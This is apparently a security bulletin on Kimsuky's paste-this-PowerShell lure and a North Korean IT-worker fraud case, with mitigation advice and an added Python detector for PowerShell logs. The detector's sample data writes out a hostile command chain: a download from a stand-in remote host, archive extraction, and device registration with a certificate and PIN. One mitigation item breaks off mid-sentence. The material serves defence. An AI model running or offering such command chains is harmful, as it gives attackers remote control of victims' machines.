Summary: North Korean threat actor Kimsuky has been observed employing a new social engineering tactic to trick victims into running malicious PowerShell commands as administrators. The attackers impersonate South Korean government officials, gradually building rapport with targets before sending a spear-phishing email containing a PDF attachment. To access the document, victims are directed to a registration link, which instructs them to open PowerShell with administrative privileges, copy a provided code snippet, and execute it. This code downloads a browser-based remote desktop tool from a remote server, along with a certificate containing a hardcoded PIN. Once executed, the system sends a web request to register the victim's device using the certificate and PIN, granting the attackers remote access. Microsoft, which has tracked this activity since January 2025, notes that this method represents a departure from Kimsuky's traditional tactics. Other North Korean-linked groups have also adopted similar compromise strategies, such as the Contagious Interview campaign, which tricks macOS users into executing malicious commands under the guise of fixing browser access issues for cameras and microphones. These tactics, along with the growing popularity of "ClickFix" methods, capitalize on user actions to bypass security protections, making them particularly effective.
In a separate but related case, U.S. authorities charged Arizona resident Christina Marie Chapman for facilitating a fraudulent IT employment scheme that enabled North Korean threat actors to infiltrate over 300 U.S. companies, including Fortune 500 firms, between October 2020 and October 2023. Chapman conspired with North Korean IT workers to steal the identities of U.S. citizens, submit falsified documents to the Department of Homeland Security, and secure remote jobs under false pretenses. To further the scheme, she operated a laptop farm from her residence, maintaining multiple laptops to create the illusion that the workers were based in the U.S., when in reality, they were connecting remotely from China and Russia. The operation generated over $17.1 million in illicit revenue, violating international sanctions. Chapman was arrested in May 2024, and authorities disclosed that her actions compromised more than 70 U.S. identities, led to the falsification of tax liabilities, and resulted in the transmission of false information to DHS on more than 100 occasions.
Security Officer Comments: As U.S. law enforcement increases its scrutiny of these operations, North Korean IT workers have escalated their activities, moving beyond financial fraud to direct cyber threats. Reports indicate that some workers have engaged in data exfiltration and extortion, leveraging their access to company systems to steal proprietary information and hold it hostage. The FBI recently warned that after being discovered on corporate networks, these actors have threatened to release sensitive data unless ransom demands are met. In some cases, they have publicly leaked proprietary code, posing a significant security and financial risk to affected organizations.
Suggested Corrections:
- Restrict PowerShell Execution: Enforce execution policies to prevent users from running untrusted scripts. Consider implementing PowerShell Constrained Language Mode and Just Enough Administration (JEA) to limit privileges.
- Application Allowlisting: Use application control mechanisms like Microsoft Defender Application Control (MDAC) or AppLocker to prevent unauthorized execution of scripts.
- Endpoint Detection and Response (EDR) Monitoring: Deploy advanced endpoint security solutions to detect and block suspicious PowerShell activity, particularly scripts executing remote commands.
- User Awareness Training: Educate users on social engineering tactics, such as phishing emails impersonating government officials, and instruct them never to execute unverified commands.
- Email Security Controls: Implement email filtering and attachment scanning to detect spear-phishing attempts. Use DMARC, DKIM, and SPF to mitigate
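As an added example that is not part of the original report, the following Python triages PowerShell script-block log text (Windows Event ID 4104, produced by script block logging, which the EDR monitoring recommendation above depends on) for the stages the summary describes: a download from a remote server, archive extraction, certificate or PIN material, and a device-registration web request, weighted more heavily when the session ran elevated. The event structure, the `elevated` enrichment field, the indicator list, the alert threshold and the sample events are all constructed assumptions, not Microsoft's detection logic or any real telemetry.

```python
import re
from dataclasses import dataclass


@dataclass
class ScriptBlockEvent:
    """One PowerShell script-block logging event (Event ID 4104) as a SIEM might export it.
    `elevated` is an assumed enrichment field: was the host process running as administrator?"""
    user: str
    elevated: bool
    script: str


# Each indicator corresponds to one stage of the chain described in the summary
# (download remote tool, unpack it, certificate/PIN material, register the device).
INDICATORS = {
    "remote_download": re.compile(
        r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|DownloadFile|DownloadString)\b",
        re.I),
    "archive_extract": re.compile(r"\bExpand-Archive\b", re.I),
    "cert_or_pin": re.compile(r"(\bcertificate\b|\bpin\b|\.(pfx|cer|pem)\b)", re.I),
    "device_registration": re.compile(r"\b(register|enroll)\w*", re.I),
}

# Assumed threshold: a single download cradle alone is routine admin/dev activity;
# several stages together, in an elevated session, is what warrants an alert.
ALERT_THRESHOLD = 3


def score_event(ev: ScriptBlockEvent):
    """Return (score, matched indicator names) for one event."""
    matched = [name for name, rx in INDICATORS.items() if rx.search(ev.script)]
    score = len(matched)
    if ev.elevated and score:
        score += 1  # elevation only matters when something suspicious ran
    return score, matched


def triage(events):
    """Return alert records for events at or above ALERT_THRESHOLD."""
    findings = []
    for idx, ev in enumerate(events):
        score, matched = score_event(ev)
        if score >= ALERT_THRESHOLD:
            findings.append({"index": idx, "user": ev.user, "score": score, "indicators": matched})
    return findings


# Constructed sample events: two benign, one matching the described pattern
# (hostnames and the PIN are placeholders, not real indicators).
SAMPLE_EVENTS = [
    ScriptBlockEvent("CORP\\admin1", True,
                     "Get-Service | Where-Object Status -eq 'Running' | Sort-Object Name"),
    ScriptBlockEvent("CORP\\dev2", False,
                     "Invoke-WebRequest -Uri 'https://packages.example.invalid/build-tools.zip' "
                     "-OutFile build-tools.zip"),
    ScriptBlockEvent("CORP\\user3", True,
                     "Invoke-WebRequest -Uri 'https://REMOTE-HOST.invalid/rdtool.zip' -OutFile $env:TEMP\\rdtool.zip; "
                     "Expand-Archive $env:TEMP\\rdtool.zip $env:TEMP\\rdtool; "
                     "$cert = Get-Content $env:TEMP\\rdtool\\device.pem; "
                     "Invoke-RestMethod -Uri 'https://REMOTE-HOST.invalid/register' -Method Post "
                     "-Body @{certificate=$cert; pin='<PIN>'}"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"ALERT user={f['user']} score={f['score']} indicators={','.join(f['indicators'])}")
```

Only the third sample event reaches the threshold; the developer's plain download scores one point and is left alone, which is the point of scoring stages together rather than alerting on every web request. In production the script text would come from the 4104 `ScriptBlockText` field and the elevation flag from the collector's process context.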
Link(s): https://thehackernews.com/2025/02/north-korean-hackers-exploit-powershell.html